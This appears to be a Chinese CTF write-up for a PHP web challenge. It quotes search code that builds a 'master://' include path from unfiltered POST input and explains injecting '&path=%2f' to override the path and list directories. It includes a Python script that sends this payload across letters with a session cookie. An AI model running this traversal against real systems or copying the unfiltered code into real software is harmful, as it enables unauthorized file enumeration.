经过前辈提示,入口果然还是在search页面,那个include()和master类
search语句
if(isset($_POST['name']))
{
$userpath=$results['userpath'];
$userpath='uploads%2f'.$userpath.'%2f';
$master='master://search/path='.$userpath.'&name='.$_POST['name'];
//var_dump($master);
include $master;
}
master类中的search函数
function search($path,$name)
{
if(!is_dir($path))
{
echo 'illegal!';
return 1;
}
$files=scandir($path);
echo '</br>';
foreach($files as $k=>$v)
{
if(str_ireplace($name,'',$v)!==$v)
{
echo $v.'</br>';
}
}
return 1;
}
整个流程是用户注册时会随机生成name拼接在一起:
$master='master://search/path='.$userpath.'&name='.$_POST['name']
//调用master类协议中的search函数,提交两个参数path和name,且使用&进行连接
考虑在name后再拼接一个path变量,覆盖之前的path,通过代码可以看到对于name和path没有过滤,只是规定了path变量必须为目录。
造轮子:
关键字&path=%2f //关键字可以从[a-z]依次遍历,path设置为%2f会访问www服务文件夹所在目录
达到的结果就是越权遍历目录
写了个脚本来实现遍历:
import requests
from bs4 import BeautifulSoup
url = "http://xxxxxxxx:56000/search.php"
#letter_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
# 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
# 'w', 'x', 'y', 'z']
dir = []
post = {}
test = requests.get(url)
if test.status_code == 200:
print("Connection Succeed!\n")
print("*******************\n")
else:
print("Fail!!!\n")
for i in range(65,91):
post["name"] = chr(i) + "&path=%2f"
cookie = {
"PHPSESSID":"xxxxxxxxxxxxxxxxx"
}
r = requests.post(url,data=post,cookies=cookie)
soup = BeautifulSoup(r.text,features="html.parser")
print(soup.prettify())
print("-------------")
print("Done.")
网友评论